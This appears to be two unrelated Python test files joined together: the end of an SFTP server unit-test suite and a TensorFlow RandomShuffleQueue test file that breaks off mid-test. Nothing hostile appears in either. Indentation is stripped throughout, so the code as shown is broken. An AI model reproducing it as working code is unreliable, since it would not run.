sftpint(
SSH2_FILEXFER_ATTR_SIZE |
SSH2_FILEXFER_ATTR_PERMISSIONS |
SSH2_FILEXFER_ATTR_ACMODTIME
),
            sftpint64(size),  # 100 bytes
sftpint(33152), # 0o100600
sftpint(atime),
sftpint(mtime)
)
self.server.process()
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
self.assertEqual(
0o600,
stat.S_IMODE(os.lstat(remote_file('services')).st_mode)
)
self.assertEqual(
atime,
os.lstat(remote_file('services')).st_atime
)
self.assertEqual(
mtime,
os.lstat(remote_file('services')).st_mtime
)
self.assertEqual(
size,
os.lstat(remote_file('services')).st_size
)
os.unlink(remote_file('services'))
def test_read_subdir(self):
f = {b'.', b'..', b'bar'} # files inside foo
os.mkdir(remote_file("foo"))
foobar_path = os.path.join(remote_file("foo"), "bar")
with open(foobar_path, 'a') as stream:
print("foobar", file=stream)
# bar_size = os.lstat(foobar_path).st_size
self.server.input_queue = sftpcmd(
SSH2_FXP_OPENDIR,
sftpstring(b'foo')
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
l = set()
while (True):
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READDIR,
sftpstring(handle),
)
try:
self.server.process()
filename = get_sftpname(self.server.output_queue)
l.add(filename)
except:
break
self.assertEqual(l, f)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
rmtree(remote_file("foo"))
def test_open_not_found(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_READ),
sftpint(0),
)
self.assertRaises(SFTPNotFound, self.server.process)
def test_remove(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE),
sftpint(SSH2_FILEXFER_ATTR_PERMISSIONS),
sftpint(0o644)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
self.server.input_queue = sftpcmd(
SSH2_FXP_REMOVE,
sftpstring(b'services'),
sftpint(0)
)
self.server.process()
def test_rename(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE),
sftpint(SSH2_FILEXFER_ATTR_PERMISSIONS),
sftpint(0o644)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
self.server.input_queue = sftpcmd(
SSH2_FXP_RENAME,
sftpstring(b'services'),
sftpstring(b'other_services'),
)
self.server.process()
self.assertIn('other_services', os.listdir(REMOTE_ROOT))
os.unlink(remote_file('other_services'))
def test_remove_notfound(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_REMOVE,
sftpstring(b'services'),
sftpint(0)
)
self.assertRaises(SFTPNotFound, self.server.process)
def test_mkdir_notfound(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_MKDIR, sftpstring(b'bad/ugly'), sftpint(0))
self.assertRaises(SFTPNotFound, self.server.process)
def test_readdir(self):
f = {b'.', b'..', b'foo', b'bar'}
os.mkdir(remote_file("foo"))
os.close(os.open(remote_file("bar"), os.O_CREAT))
self.server.input_queue = sftpcmd(
SSH2_FXP_OPENDIR,
sftpstring(b'.')
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
l = set()
while (True):
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READDIR,
sftpstring(handle),
)
try:
self.server.process()
filename = get_sftpname(self.server.output_queue)
l.add(filename)
except:
break
self.assertEqual(l, f)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
os.unlink(remote_file("bar"))
os.rmdir(remote_file("foo"))
def test_symlink(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_SYMLINK, sftpstring(b'bad/ugly'), sftpstring(b'bad/ugliest'), sftpint(0))
self.assertRaises(SFTPNotFound, self.server.process)
self.server.input_queue = sftpcmd(
SSH2_FXP_SYMLINK, sftpstring(b'ugly'), sftpstring(b'ugliest'), sftpint(0))
self.server.process()
self.assertIn('ugly', os.listdir(REMOTE_ROOT))
def test_readlink(self):
os.symlink("infound", remote_file("foo"))
self.server.input_queue = sftpcmd(
SSH2_FXP_READLINK, sftpstring(b'foo'), sftpint(0))
self.server.process()
link = get_sftpname(self.server.output_queue)
self.assertEqual(link, b"infound")
def test_readdir_broken_symlink(self):
os.symlink("infound", remote_file("foo"))
self.server.input_queue = sftpcmd(
SSH2_FXP_READLINK, sftpstring(b'foo'), sftpint(0))
self.server.process()
link = get_sftpname(self.server.output_queue)
self.assertEqual(link, b"infound")
self.server.output_queue = b''
f = {b'.', b'..', b'foo'}
self.server.input_queue = sftpcmd(
SSH2_FXP_OPENDIR,
sftpstring(b'.')
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
l = set()
while (True):
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READDIR,
sftpstring(handle),
)
try:
self.server.process()
filename = get_sftpname(self.server.output_queue)
l.add(filename)
except:
break
self.assertEqual(l, f)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle),
)
self.server.process()
def test_init(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_INIT, sftpint(2), sftpint(0)
)
self.server.process()
version = get_sftpint(self.server.output_queue)
self.assertEqual(version, SSH2_FILEXFER_VERSION)
def test_rmdir_notfound(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_RMDIR, sftpstring(b'bad/ugly'), sftpint(0))
self.assertRaises(SFTPNotFound, self.server.process)
def test_copy_services(self):
self.server.input_queue = sftpcmd(
SSH2_FXP_OPEN,
sftpstring(b'services'),
sftpint(SSH2_FXF_CREAT | SSH2_FXF_WRITE | SSH2_FXF_READ),
sftpint(SSH2_FILEXFER_ATTR_PERMISSIONS),
sftpint(0o644)
)
self.server.process()
handle = get_sftphandle(self.server.output_queue)
# reset output queue
self.server.output_queue = b''
etc_services = open('/etc/services', 'rb').read()
etc_services_size = \
os.lstat('/etc/services').st_size # size of the whole file
self.server.input_queue = sftpcmd(
SSH2_FXP_WRITE,
sftpstring(handle),
sftpint64(0),
sftpstring(etc_services)
)
self.server.process()
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READ,
sftpstring(handle),
sftpint64(0),
sftpint(
etc_services_size
)
)
self.server.process()
data = get_sftpdata(self.server.output_queue)
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_READ,
sftpstring(handle),
sftpint64(etc_services_size),
sftpint(1) # wait for the EOF
)
# EOF status is raised as an exception
self.assertRaises(SFTPException, self.server.process)
# reset output queue
self.server.output_queue = b''
self.server.input_queue = sftpcmd(
SSH2_FXP_CLOSE,
sftpstring(handle)
)
self.server.process()
r_services = remote_file('services')
self.assertEqual(
etc_services,
open(r_services, 'rb').read()
)
self.assertEqual(
etc_services,
data
)
self.assertEqual(
0o644,
stat.S_IMODE(os.lstat(r_services).st_mode)
)
self.assertEqual(
etc_services_size,
os.lstat(r_services).st_size
)
os.unlink(r_services)
def tearDown(self):
"""Clean any leftover."""
for f in os.listdir(LOCAL_ROOT):
try:
os.unlink(f)
except:
rmtree(f)
for f in os.listdir(REMOTE_ROOT):
f = remote_file(f)
try:
os.unlink(f)
except:
rmtree(f)
@classmethod
def teardown_class(cls):
"""Clean the created directories."""
rmtree(LOCAL_ROOT, ignore_errors=True)
os.unlink(t_path("log")) # comment me to see the log!
if __name__ == "__main__":
unittest.main()
|
random_shuffle_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
@test_util.run_v1_only("RandomShuffleQueue removed from v2")
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = self.evaluate(dequeue_t)
results.append((a, b))
a, b = self.evaluate(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
self.evaluate(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
self.evaluate(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(self.evaluate(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = self.evaluate(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], self.evaluate(size))
dequeued_t.op.run()
self.assertEqual([0], self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, self.evaluate(size_t))
enqueue_op.run()
self.assertEqual(0, self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpTo(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testEmptyDequeueUpToWithNoShape(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
self.evaluate(dequeued_t)
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = self.evaluate(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = self.evaluate(dequeued_t).tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = self.evaluate(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = self.evaluate(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.cached_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(self.evaluate(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
with self.cached_session() as sess:
min_size = 2
q = data_flow_ops.RandomShuffleQueue(10, min_size, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
# Manually dequeue until we hit min_size.
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
def blocking_dequeue():
results.append(self.evaluate(dequeued_t))
results.append(self.evaluate(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=blocking_dequeue)
dequeue_thread.start()
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
